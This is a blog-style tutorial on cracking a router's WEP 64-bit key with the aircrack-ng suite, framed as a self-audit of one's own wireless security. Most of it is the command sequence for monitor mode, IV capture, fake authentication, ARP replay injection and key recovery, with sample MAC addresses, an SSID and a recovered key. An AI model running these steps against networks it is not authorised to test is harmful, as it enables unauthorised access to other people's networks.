Hack Wep Encryption with Aircrack


That’s right, I am here trying to persuade everyone to turn off your wireless connection. In all reality I’m not really trying to tell you to turn off your wifi access, but will try to make you more aware of certain security vulnerabilities that wireless can offer.

In this article I am going walk you through on how a war driver could hack into your wireless router that is protected with a WEP 64 bit key.  In this article I will be using an ubuntu linux ran pc, with a Belkin 9050 usb wireless adapter. The program that I will be using is called aircrack-ng. The first thing that you must do in order to check your security on your wireless router, is find a wireless adapter that can be put into monitor mode. To check to see if your wireless adapter is compatible.After you have a compatible adapter and the driver is all setup, then you have to enable monitor mode. Just to note, your wireless adapter may take on a different name, then mine does. To find out what your wifi card is called, type in the command ifconfig. Throughout this article, I will be using a terminal program logged in under su.

The first thing that you are going to want to do when auditing your wireless security on your router is find out a little bit of information, in order for you to audit your wireless router, you will first have to turn on monitor mode / promiscuous mode.

airmon-ng start wlan0

Since you will be hacking into your own wireless router, you will see how this is done from a hacker’s point of view. The next command that you will issue, will allow you to view a list of local wireless networks in your network, what channel the network is on and the Mac address of the router.

airodump-ng mon0

Airodump-ng

In order to test the security on your wireless network, you need to record the Mac address of your router, what channel your router is on, SSID, and the Mac address of your wireless adapter. In order to find the Mac address of your wireless adapter; open a terminal window and issue the command ifconfig. You should see your Mac address, listed as HWaddr. After your have recorded all the important information you need, you now need to shut down your wireless adapter.

airmon-ng stop mon0

airmon-ng stop wlan0

Start monitor mode on again and set channel to 1.

airmon-ng start wlan0 1

airmon-ng

We will now test and see if we can inject packets into the router.

aireplay-ng -9 -e 2WIRE276 -a 00:18:3F:7A:B8:11 mon0

Start airodum-ng and capture Ivs

airodump-ng -c 1 --bssid 00:18:3F:7A:B8:11 -w output mon0

airodump-ng Capture IV

Authenticate with the router

aireplay-ng -1 0 -e 2WIRE276 -a 00:18:3F:7A:B8:11 -h 00:11:50:FD:68:FC mon0

OR

aireplay-ng -1 6000 -o 1 -q 10 -e 2WIRE276 -a 00:18:3F:7A:B8:11 -h 00:11:50:FD:68:FC mon0

Authenticate with Wireless Router

Collect Arp requests used to create data.

aireplay-ng -3 -b 00:18:3F:7A:B8:11 -h 00:11:50:FD:68:FC mon0

ARP Request

Use Aircrack-ng to obtain wep key.

aircrack-ng -z -b 00:18:3F:7A:B8:11 output*.cap

aircrack-ng

airmon-ng stop mon0

airmon-ng stop wlan0

Login using key: 313865309